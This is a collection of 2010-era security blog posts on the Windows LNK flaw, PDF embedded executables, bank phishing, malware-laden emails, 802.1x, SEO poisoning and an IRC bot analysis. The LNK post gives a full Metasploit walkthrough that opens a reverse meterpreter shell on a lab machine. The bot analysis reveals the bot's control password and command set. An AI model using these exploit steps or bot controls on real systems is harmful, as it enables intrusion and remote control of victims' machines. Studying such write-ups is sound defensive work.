chakraviewBlog

On 16th July, 2010 a researchers found out a new shortcut to Pawn Remote System in an unusual way. They crafted a way to exploit windows shortcut files, commonly referred as .lnk file in order to gain unauthorized access to remote computer.

Users need not even click the shortcut file, if s/he views it in explorer; that’s it…Game Over!! Interesting right?

Let’s dig deeper to know the exact cause of this shortcut to pawnage

Vulnerability:

There exists an unpatched vulnerability (CVE-2010-2568) in the Windows .lnk file (aka shortcuts)/piff file parser code. Windows automatically executes the malicious code when a specially crafted .lnk/piff file is read by windows explorer or any other similar application displaying icons for the shortcuts. This vulnerability can be exploited locally from USB drives or over a network shared or even from remote WebDAV locations.

As this vulnerability is not related to buffer overflows or memory corruptions etc.; ASLR and protected mode will not help in avoiding exploitation. All versions of Windows OS are affected from this vulnerability.

Exploitation:

According to AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild and has seen fully patched Windows 7 machines getting infected by a worm exploiting this vulnerability. See references for the complete document on the Worm Analysis.

After successful exploitation of the vulnerability, worm sends “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” message to the Windows debugger.

Metasploit also just released an exploit module for this attack which uses WebDAV location as an attack vector. We will have a complete demonstration of this exploit in the pawnage section.

Workarounds/Mitigation:

Microsoft is asking end users to utilize following registry workaround to disable icons from being displayed in windows shell. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

• Open RegEdit
• Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
• Change the value from {00021401-0000-0000-C000-000000000046} to “”
• Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler
• Change the value from {00021401-0000-0000-C000-000000000046} to “”
• Close Regedit.
• Restart the explorer.exe  or reboot windows.

Disabling WebClient Services will also help protect systems from attacks using WebDAV attack vectors.

Pawanage demo:

Let’s look at this demo on pawning a windows XP box using Metasploit. In this demo, metasploit is redirecting victims to malicious windows share containing specially crafter .lnk file and a malicious .dll file containing actual payload using a WebDAV requests.

As soon as this windows share from attackers box is read by victim’s shell(windows explorer in our case); specially crafted .lnk file inject payload .dll file in the address space of victim’s explorer process which drives the payload to gain shell.

Following is the steps followed by an attacker to exploit this vulnerability.

msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:73:7b:ff
          inet addr:192.168.146.128  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:502 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:50019 (50.0 KB)  TX bytes:5554 (5.5 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:960 (960.0 B)  TX bytes:960 (960.0 B)

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.146.128  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l

Active sessions
===============

  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  1   meterpreter  VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5  192.168.146.128:4444 -> 192.168.146.129:1039

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS      : Windows XP (Build 2600, ).
Arch    : x86
Language: en_US

GAME OVER!!!

Following is the video demonstration of above attack using Metasploit.

References:

• Windows Advisory
• .lnk worm analysis

Last month a security researcher Didier Stevens published a PoC PDF file which had executable embedded inside it. Though Metasploit framework already has this attack module to embed any executable inside a PDF file, the approached used by Didier Stevens is different and does not involve use of Javascript.

As JavaScript is not used, disabling JavaScript in the PDF viewer will not help. PDF viewers like Adobe Reader and Foxit Reader don’t allow to execute embedded binary files while “/Launch /Action” PDF commands ultimately run an executable.  A Launch action is used to run an application or opening or printing a document.

When PoC was tested in Adobe Acrobat reader, following warning box was displayed.

Stevens is also able to control the message displayed in the Warning Message Box. Stevens said Adobe’s PDF Reader will block the file from automatically opening but he warned that an attacker could use social engineering tricks to get users to allow the file to be opened. Foxit Reader is even worst and opens the file without any warning.

Attacker controlled warning message

Stevens tested his research on Adobe Reader 9.3.1 (Windows XP SP3 and Windows 7).

PoC tested in my test environment

Two weeks before, security researchers started seeing emails claiming to be from Royal Mail with an attached PDF file. This attached PDF file has another attachment within itself named “Royal_Mail_Delivery_Notice.pdf”. This attached pdf files contained but obvious compressed executable.

This new trick is used  to install Zeus bot on victim computer once they open the attachment. This PDF uses the JavaScript function exportDataOject to save the attachment on the computer and once saved uses Launch/Action command to launch the saved copy of executable.

Having updated or latest version of Adobe and Foxit reader will not protect you from this attack as attackers are not exploiting any vulnerability to install bot on system; rather making use of the legitimate PDF specification.

The only way to prevent ourself from such attack is to disable opening of non pdf attachments option.

Workaround for Acrobat users

Beware of such emails and do not open PDF attachments originating from untrusted source.

References:

• Escape from PDF
• Metasploit: Adobe_PDF_embedded_exe.rb
• PDF features used to launch Zeus bot

For past few days, I was getting fraud emails impersonating HDFC and IDBI banks. Emails looked pretty legitimate unless you looked into the email headers or actually visited the link provided in them.

Below are some screen shots of the emails that I received. You may also see some superficial investigation I underwent to make sure those emails were indeed phishing emails.

Confirm your ip address: HDFC bank phishing

If you have a close look at the mentioned IP addresses in the email, you will find IP address starting with 812.xxx.xxx.xxx Normal computer users are usually not much tech savvy and hence they might think those IP addresses are correct.

Clicking the provided link leads to URL which is now taken down : hxxp://unions.lk/images/randomimage/hdfcpage/hdfcpage/hd.php

Classing IDBI Phishing attack email

Following is the screen shot of the phishing email I received requesting to change my Netbanking password even though I am not an IDBI customer.

Classing Phishing email requesting to change your netbanking password

Now to check the authenticity of this email, i checked the email headers and found out that email is originated from

psmtp30.wxs.nl [195.121.247.32]

residing in Netherlands. This is really suspicious as The Industrial Development Bank of India Limited (IDBI) do no have any network in Netherlands

Email headers from IDBI Phising email

A simple email verification query against real IDBI.com revealed following mail server information.

Real IDBI mail servers

Please beware of such emails.

We have seen US, UK, Brazilian financial institutes getting targeted by phishers and spammers but it looks like they are now targeting Indian banks as well.

Following are the precautionary measures that you can take:

1) Do not open emails from unknown people, even though they appear to be coming from a hot chick

2) Always verify the browser address bar and make sure it belongs to domain it is claiming to be

3) Do not fill in personal details unless you are confident about the authenticity of target website

4) Always ascertain that you are entering details on the website guarded by trusted digital certificate authorities like Verisign, Thwarte etc.

5) If unsure, contact bank and make sure received email is legitimate.

Such emails are usually used as stepping stone for carrying out numerous attacks like, gathering credit card/personal information, carry out identity theft, planting malware on victim’s computer etc.

I hope this entry will be helpful. Till then Stay safe

Yesterday, I got an email saying some company has filed a lawsuit against me in court with the link to download a word file supposed to be containing copyright law violations.
As expected it turned out to be a very sophisticated social engineering attack. When I downloaded the file and scan in virustotal, very few antiviruses were able to detect it.
I thought of analysing it today and guess what, my Microsoft Security Essential which had no clue yesterday about the suspecious .doc file has detected it as a trojan dropper malware and removed it. Damn, I should have taken backup of it

Anyways, following are the some of the surface details about the piece of malware.

File size        :      76827 bytes
Filetype       :     Rich Text Format data, version 1, ANSI
MD5              :     6db76304a2aff6bef94364b86abd8b7f

SHA1            :     14451211a50d6ef71b4c2a24601607471f52a7ef

Malware is also named as :

• Mal/RtfExe-A
• RTF.EmbedEXE.Gen
• TR/Dropper.Gen
• Trojan.Dropper.Gen
• Suspicious.Insight

Please don’t fall pray to such emails. Please do not  download & open documents received from unknown/untrusted source.

If you find this[r439875.doc] file on your system, then

• Delete the file
• Scan your computer with updated anti-virus software.
• Update and install latest MS Word patches.

Following is the email data used in the social engineering attack.

March 25, 2010
Marcus Law Center
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link bellow is a copy of the lawsuit that we filed against you in court on March 15, 2010.
Currently the Pretrail Conference is scheduled for April 15th, 2010 at 10:00 A.M. in courtroom #12.
The case number is 3478254. The reason the lawsuit was filed was due to a completely inadequate response
from your company for copyright infrigement that our client Danilison Inc is a victim of.
http://www.marcuslawcenter.com/s/r439875.doc [removed]

Danilison Inc has proof of multiple Copyright Law violations that they wish to present in court on April 15th, 2010.

Sincerely,
Marcus Law Center
Marcus Law Center LLP

References:

1. Virus Total Result

IE Aurora‘s dust was not even settled in our minds and yet another critical vulnerability in IE has emerged with a bang !!

A Security Consultant from CORE Security Technologies, Mr.Jorge Luis Alvarez Medina discussed a vulnerability in BlackHat DC 10 conference. His presentation demonstrated a Proof of Concept code which exploits this vulnerability and allows an attacker to access any file from victim’s machine.

Medina chained “Bypassing URL security Zone feature” and Browser file sharing protocol attacks and showed how easy it is to read a file from a known location.

Medina further said that these vulnerabilities are weak Internet Explorer features that leave an open door for different kinds of attacks.

Microsoft has acknowledged the vulnerability and issued a security advisory.

Microsoft has also confirmed that Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.

According to Advisory Protected Mode in Internet Explorer on Windows Vista and later limits the impact of the vulnerability while risk is highest for IE users running Windows XP or who have disabled the browser’s Protected Mode feature.

Core security group has released a white paper on “Abusing insecure features of IE” which demonstrates the internals of the exploitation process.

References:

1. Microsoft Security Advisory 980088
2. Internet Explorer turns your personal computer into a public file server
3. Internet Explorer URL Zone Security Bypass
4. Download White Paper from Core Security Group

To avoid physical security breaches and un-authorized access from publicly available network ports laying in lobby or reception, companies use port based authentication schemes.
Once implemented device needs to authenticate itself with the authenticating server to prove its identity and once proved, gets access to the network. Thus providing authentication mechanism to devices wishing to attach to a LAN port.
These implementations are more common in Wireless access points however nowadays wired networks also are taking their fair share.
I will break up this tutorial in two parts:

1. Setting up 802.1x authentication in Wired VoIP network.
2. Breaking Port based Authentication to gain unauthorized access.

Some Basics Theory:

802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.

The supplicant is often software on a client device, such as a laptop, the authenticator is a wired Ethernet switch or wireless access point, and an authentication server is generally a RADIUS database.
The authenticator acts like a security guard to a protected network. The supplicant (i.e., client device) is not allowed access through the authenticator to the protected side of the network until the supplicant’s identity is authorized.

With 802.1X port-based authentication, the supplicant provides credentials, such as user name / password or digital certificate, to the authenticator, and the authenticator forwards the credentials to the authentication server for verification.

If the credentials are valid (in the authentication server database), the supplicant (client device) is allowed to access resources located on the protected side of the network.
If the authenticating server accepts the request, the authenticator sets the port to the “authorized” mode and normal traffic is allowed.

When the supplicant logs off, it sends an EAP-logoff message to the authenticator. The authenticator then sets the port to the “unauthorized” state, once again blocking all non-EAP traffic.

The basic authentication transaction can be shown as:
We will setup up the port based authentication using following supplicants, authenticator and Authentication server.

• Supplicant: Cisco Unified IP Phone 7961G-GE
• 802.1x Authenticator: Cisco Catalyst 3560 (WS-C3560G-24PS)
• Radius Server: CiscoSecure ACS 4.1

I will not go through the whole installation and configuration procedure of all the above mentioned devices. I hope you already have same or equivalent devices in your network. Here we will cover only needed configuration steps.

Radius Server Configuration:

• One can do administrative tasks once Cisco ACS 4.1 server is successfully installed.
• First talk is to setup Authenticator.
• Click on Network Configuration from left pane.

• Add Your Authenticator details as shown in following screenshots including shared secret of Authenticator.
• Click on Submit+Apply Button.
• Now add users to authenticate in the user database.
• Click on User Setup: First button from left pane.
• Add the username in the input box and click on Add.
• You can find the username from phone security settings.

• Under user setup form, Enter shared secret(password) for the device. This password will be used as authentication secret by phone device.
• Repeat above steps for all the devices present in the network.

802.1x Authenticator:

• Login to the switch and go to configure mode.
• Under config mode use following CLI to enable authenticator functionality.

WS-C3560G-24PS(config)# aaa authentication dot1x default group radius
WS-C3560G-24PS(config)# radius-server host <ipAddr_Radius_Server> auth-port 1645 acct-port 1646 key <sharedsecret with radius server>

• Now configure switch ethernet interfaces for 802.1x authetication using following sequence of CLI’s

WS-C3560G-24PS(config)#interface GigabitEthernet0/7
WS-C3560G-24PS(config-if)#dot1x pae authenticator
WS-C3560G-24PS(config-if)#dot1x port-control auto
WS-C3560G-24PS(config-if)#dot1x violation-mode protect
WS-C3560G-24PS(config-if)#dot1x timeout reauth-period 20
WS-C3560G-24PS(config-if)#dot1x reauthentication
WS-C3560G-24PS(config-if)#end
WS-C3560G-24PS(config)# write mem

Supplicant Configuration:

I am using Cisco 7961G IP Phone as a supplicant here. All the configuration steps mentioned here are same for all Cisco IP Phone supporting 802.1x Authentication supplicant.

• Unlock the Phone configuration by pressing *##*
• Once unlocked. Go to Options and “Security Configuration” menu.
• Scroll down till you come across 802.1x Authentication sub-menu.
• Select “Device Authentication” and Change it to “Enable“. By default, Device Authentication is Disabled.

• Now select “EAP-MD5” Sub-menu and configure a “shared secret” for authentication which we have configured in the Radius Server.
• Refer to adjacent screen shots for more details.
• Save the configuration and reboot the phone.

If everything is setup fine on all the 3 tiers then you will see phone getting IP address after successful 802.1x authentication.

Following Wireshark Capture depicts typical conversation between Supplicant and Authenticator.

Wireshark trace

If any other device tries to connect itself on the same Ethernet port, it will get challenged by Authenticator. Devices unsuccessful in correct response to the challenge, will get blocked from accessing services in wired LAN network.

This mechanism is fair enough to stop some physical security breaches. In the next part, we’ll see how this Port Based Authentication can be hacked to gain un-authorized access in the wired network implementing EAP-MD5 802.1x authentication mechanism.
Stay tuned…

What is SEO

Search engine optimization (SEO) is the process of improving the volume or quality of traffic to a web site.  As an internet marketing strategy, webmasters edit the HTML content to increase its relevance to popular keywords; thereby raising ranking of their websites.

SEO techniques can be broadly categorized under white hat and black hat techniques.
Wikipedia says

“A search engine optimization technique is considered white hat SEO if it conforms to the search engines’ guidelines and involves no deception while Black hat SEO attempts to improve rankings in ways that are disapproved of by the search engines, or involve deception. One black hat technique uses text that is hidden, either as text colored similar to the background, in an invisible iframe tag.”

SEO poisoning attacks are primarily the attacks on popular websites that make use of  hidden iframe tags. An attacker creates a fake web page with proper SEO and using hidden iframes redirects web browsers to rouge websites.

The recently released Apple ipad is utilized for Blackat SEO poisoning attack.

When searched with keywords such as “Apple ipad”, “Apple tablet”, “Apple tablet announcement” or “Apple ipad rumor” on Google or any search engine, the results yield websites which may compromise your system.

SEO Poisoned URL

Usage of Search Engine Optimization (SEO) Poisoning pushes the infected URLs to the top of the search results, thus, increasing the chance of a user clicking the malicious URL.
Hypothetically, if a user clicks the URL from a search result, he gets redirected to a malicious web site pretending as fake anti-virus or fake video codec software.
For instance, when I clicked on one such link, I was redirected to a website pretending to be rogue antivirus software which freely scanned my laptop online and displayed bunch of virus infections.

Virus Infection summary from my system

After the scan, website also popped up a message box asking me to fix the problems. As soon as I clicked on the message box, a rogue antivirus software installer was downloaded on my system.

Fake AV software installer

After installation of this so-called antivirus, it performed a complete scan of my system and displayed numerous problems which even my fully updated commercial antivirus software was unable to make out. When asked to fix the discovered problems, it invited me to purchase a full version of software for a discounted price of $69.

Beware of such websites !!!

Conclusion:

No anti-virus software ever does free online scanning and display infections on your screen. These are just sophisticated social engineering techniques used by malicious hackers to fool users.

Cyber criminals are targeting popular and controversial events and harvesting keywords to perform SEO poisonings attacks. They tend to catch attention of users who later get trapped in this vicious circle.  The Tiger Woods story is one such incident that made mole out of the mountain.

So, all that glitters is not gold, apni akal lagao

References:

• Virus total analysis of so called Antivirus software

Smule released a supercool app for iPhone on 16th Sept that can actually simulate real lighter.
Just flick on the iPhone and tilt screen to enjoy the flame reactions. Sonic lighter truly demonstrates the power of accelerometer and sound frameworks.

The best features of sonic lighter is it can lite up another iPhone. Utility emits some sound from speaker and once you put your Sonic Lighter near another iphone, it will lite up the flame from the installed Sonic Lighter application on other iphone. Isn’t that cool?

Sonic Lighter is available on apple store only on 99 cents.
Adjacent image shows typical usage examples.

Here is a small video showing Sonic Lighter in Action.

OK we know from previous post that malware is trying to connect testirc1.sh1xy2bg.NET. To learn more about its intentions, i added fake DNS entry in the XP host configuration file and pointed testirc1.sh1xy2bg.NET to my BackTrack 3 Machine. I then rebooted the live analysis machine and started Wireshark again on BT3 system.

As malware has configured itself to start whenever windows boots, it gets executed and tries to connect his master. This time its DNS query gets resolved and it tries to connect to TCP port 6667. TCP port 6667 is happened to be an IRC port.  Recall that I have already installed IRC server on the BT3 machine.  Lets start IRC Service and re-start the malware from process from Process Explorer.

This time malware connects to IRC server and joins the channel name “Chalenge” with password “happy12″. Refer to wireshark trace screenshot. Malware then changes the channel mode to monitor and hidden by mode -mnst channel control command. Changes the topic to “.asc vnc 100 0 0 -r -b”
Now I can conclude that malware is getting controlled via IRC Channel. Now the question arises: Which type of and what services malware provides to
his master? There are two ways to find this out

1. Code Analysis Via Reverse Engineering
2. Controlling the malware by connecting it.

I chose both ways simultaneously. I installed XChat2, IRC client and also joined the same channel. Unpacked strings output gave me some clues regarding the possible command malware might accept like sysinfo, driveinfo, uptime, netinfo etc.
Malware didnt respond, When I tried sending these command. There can be again two reasons behind such behavior.

• I  am trying wrong commands
• Malware has authentication.

Second reason looks obvious as why will malware author allow any Tom, Dick and Harry to control his bot? So lets find out the password for connecting malware.
Lets try to authenticate ourself as malware master. I decided to try password kind of strings from gathered string output as potential password.

To find the password we will need to start looking into binary source code of the Malware as Password has to be hardcoded in the source code. OK lets start hunting for the string “No Pass for you” in IDA pro. IDA Pro is one of the most famous and best suited debugger/disassembler for malware analysis.
The code from the snapshot has a reference for the string named “gemp123″ which is being checked against our user input.

.text:004089BE ProcessCredentials:                             ; CODE XREF: sub_403EF2+6D2j
.text:004089BE                                         ; sub_403EF2+6E7j
.text:004089BE                 mov     esi, [ebp+esi+var_9C]
.text:004089C5                 cmp     esi, ebx
.text:004089C7                 mov     dword ptr [ebp+dwProcessId], esi
.text:004089CA                 jz      loc_404369
.text:004089D0                 cmp     [ebp+var_A8], ebx
.text:004089D6                 jnz     loc_404369
.text:004089DC                 push    offset asc_425B84 	; Use Delimiter "!"
.text:004089E1                 push    [ebp+var_A0]    		; Our Supplied Nick and Domain name.
.text:004089E7                 call    _strtok			; Separate NickName from the string.
.text:004089EC                 mov     esi, eax
.text:004089EE                 push    offset word_475DB4 	; char *
.text:004089F3                 push    ebx             		; char *
.text:004089F4                 inc     esi
.text:004089F5                 call    _strtok
.text:004089FA                 push    offset asc_423648 	; "~"
.text:004089FF                 push    eax             		; Push the domain name string to get exact domain name token
.text:00408A00                 call    _strtok
.text:00408A05                 push    dword ptr [ebp+PId] 	; Push our supplied password
.text:00408A08                 mov     edi, eax                 ; Store complete domain string in EDI for further usage if needed.
.text:00408A0A                 push    offset aGemp123 		; Password for the Malware : "gemp123"
.text:00408A0F                 call    _strcmp			; Compare supplied password with gemp123
.text:00408A14                 add     esp, 20h			; ReOrganize stack
.text:00408A17                 test    eax, eax			; Check the return value of strcmp
.text:00408A19                 jz      short loc_408A66		; If Zero,Login Successful
.text:00408A1B                 lea     eax, [ebp+var_C8] 	; Login Failed. Insult Connected user.
.text:00408A21                 push    edi			; Push our Domain name
.text:00408A22                 push    eax			; Push Our nick Name
.text:00408A23                 lea     eax, [ebp+var_C8]        ;
.text:00408A29                 push    eax             		; Push Malware Bot name
.text:00408A2A                 push    offset WrnPassMsg 	; "NOTICE %s :Are you a Fucker?. (%s!%s).\r"...
.text:00408A2F                 push    [ebp+arg_4]     		;  Socket Descriptor
.text:00408A32                 call    SendMessage		; Send Message over socket.
.text:00408A37                 lea     eax, [ebp+var_C8]
.text:00408A3D                 push    eax             		; Push Malware Bot name.
.text:00408A3E                 push    offset WrnPassMesg1	; "NOTICE %s :No pass for you.\r\n"
.text:00408A43                 push    [ebp+arg_4]     		; Socket Descriptor
.text:00408A46                 call    SendMessage		; Send message over a socket
.text:00408A4B                 push    edi			; Push Domain name and other information for
.text:00408A4C                 push    esi			; logging purpose.
.text:00408A4D                 push    offset aRealmbotIrc_35 	; "RealmBoT (irc.p.l.g) .++.  *Failed pass"...

Lets try to use “gemp123″ as a password.

It looks like password is correct but malware is not liking something that may be my nickname or something else. Let try to digg more under debugger.
Again I searched for the string “WTF!? no yet fucker!.” under IDA and get all its references.  When streching eyes in Hex code, I found a function which was checking my nickname and domain with “*@legalize.it”. This made me sure that malware is accepting master only from legalize.it domain. S/He may use any nick name.

I decided to patch the malware source code and make it accept request from any domain. Refer to the screenshot where actual patching is being done.

I saved the binary with same name and restarted the process Winsec32.exe and this is what I got.
.login gemp123
[REALMBOT] : Thank for trying.

Bingo!!! We are inn. Lets explore the malware functionality by trying the earlier commands. Refer to the screenshots for the output of tried commands.

Just searching throught the binary code helped me finding out different functionality of the malware. I was able to confirm that malware has capability to perform different DoS and DDos attacks.

When you ask Malware to start Webserver, you will get Following Screenshot  kinda Output. Similarly Malware can also start FTP server on Victim Machine allowing its master to use space for data storage.

Malware is also capable of exploiting DCOM and VNC vulnerabilities on unpatched system.Following are the some of the  commands supported by Malware.

        login authentication (login password)
        logout                
        chghttp                Change HTTP Settings.
        lockdown.off           Disables 'secure' mode visit irc.v
        web.off                Disable httpd
        ftpd.off               Disable ftpd
        log.off                Disable logging
        proxy.redirect.off     Disable TCP redirector
        ddos.off               Disable all DDoS attacks
        syn.off                Disable SYN flood
        udp.off                Disable UDP flood
        ping.off               Disable ping flood
        proc.off               List processes (?)
        clone.off              kills clone
        clone                  creates a clone of self secure.stop Terminates thread processes
        scanstop               Stop Port scan thread.
        id                     Returns PID of its own process.
        status                 Sends Status information
        reboot                 As name suggest, reboots the host machine
        clearlog               Clears the maintained log file.
        opencmd                Open a command shell
        closecmd               Closes a command shell
        flusharp               Flushes the ARP cache
        flushdns               Flush DNS Cache
        prockillid             Kills a proceess by PID
        readfile               Read specific file from Disk
        keylog.on              Start Keylogging thread
        update                 Updates itself from http://www.Nivdav.net/Winsec32.exe
        execute                Execute specified command on remote system
        udpflood               Start UDP Flood DoS module
        pingflood              Start PING Flood DoS Module.
        advscan                Start port and service scan thread.
        ftp.upload             Upload file using FTP

Malware also tried to scan random hosts for  VNC service. Random IP addresses calculated from my network configuration. Here are some of the IP address contacted.

		192.168.209.95:5900
		192.168.155.129:5900
		192.168.1.19:5900
		192.168.105.160:5900
		192.168.206.49:5900
		192.168.52.194:5900
		192.168.153.83:5900
		192.168.1.225:5900
		192.168.103.113:5900
		192.168.204.2:5900

Static Binary analysis under IDA pro revealed much more information about malware like

• When Malware copies itslef in %SYSTEMROOT% folder, it creates a file with READONLY|SYSTEM|HIDDEN permissions.

• Malware makes sure only single copy of itself in running my creating a Mutex at the beginnning.

• Malware first checks if host has internet connection or network attached.

• Malware tries to exploit SMB shares.

Looking at the supported commands list we can categorized this malware under IRC bot category capable of performing DoS and DDoS attacks. We can also sub-categorized it under Keylogging, Credential Stealing.
I will conclude second installment here and will post about generating Signature of Malware and code snippets of removal tool in last and final part of this series.  I hope to you guys soon..

References:

1. Analyzing IRCBOTS: Part I( Static and Behavioural Analysis)
   
2. Analyzing IRCBOTS: Part III( Removal Tool and Signature Generation)
3. IDA Pro
4. OllyDbg

Hmmmm, so you unlocked your new 1.1.4 iPhone and started playing around with various applications. Have you ever been in a situation where you installed OpenSSH ( Usually no need to install it manually, most of the jailbreaking tools will installed it for you ), and logged in from some remote machine and tried to change its default root password by using regular ‘passwd’ command and it caused underlaying BSD Substem to Crash?

The same thing happened with me also in the recent past. After changing the root password, i happily closed the SSH connection and started to browse and make some calls. I changed the summerboard theme and restarted SpringBoard to apply changes; thats it, my iphone went in endless loop, never allowed me to even open any of the applications. It restored my cool wallpaper to the original one (earth) and was looking like this –
If same thing has happened with you too, then read on or even if not still read on
There is a bug in the encryption logic of ‘passwd’ command which changes the /etc/master.passwd file. The only way to recover from this crash is to restore back the iPhone.

Format of Sample /etc/master.passwd file:
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by lookupd. By default,
# lookupd gets information from NetInfo, so this file will not be consulted
# unless you have changed lookupd’s configuration.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:someJunkChars:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:someJunkChars:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false

How to change the deafult r00t password?
====================================
Instead of using ‘passwd‘ command, use following manual steps.

1) On Terminal use any one of the following way to generate cypto password.

root@iBughira:~# perl -e ‘print crypt(“myPasswd”, “XX”).”\n”‘
OR
root@iBughira:~# openssl passwd -salt “XX” “myPasswd”
XXd3otv/H89.E
root@iBughira:~# openssl passwd -salt “XX” “myPasswd123″
Warning: truncating password to 8 characters
XXd3otv/H89.E
root@iBughira:~#
Where, Password must be <= 8 chars
XX = 2 char Salt.
OR
Click here to generate the new crypt password online.
2) Copy the output of this command.
3) Login to your iPhone using SSH.
4) Open the /etc/master.passwd file in vi or nano editor.
5) Replace the string after root: from /etc/master.passwd. ( i.e Replace “someJunkChars” from above sample file.)
6) Save and exit the editor.

Thats it, you are done. Root password has been changed. If this helped you, do leave comment/feedback.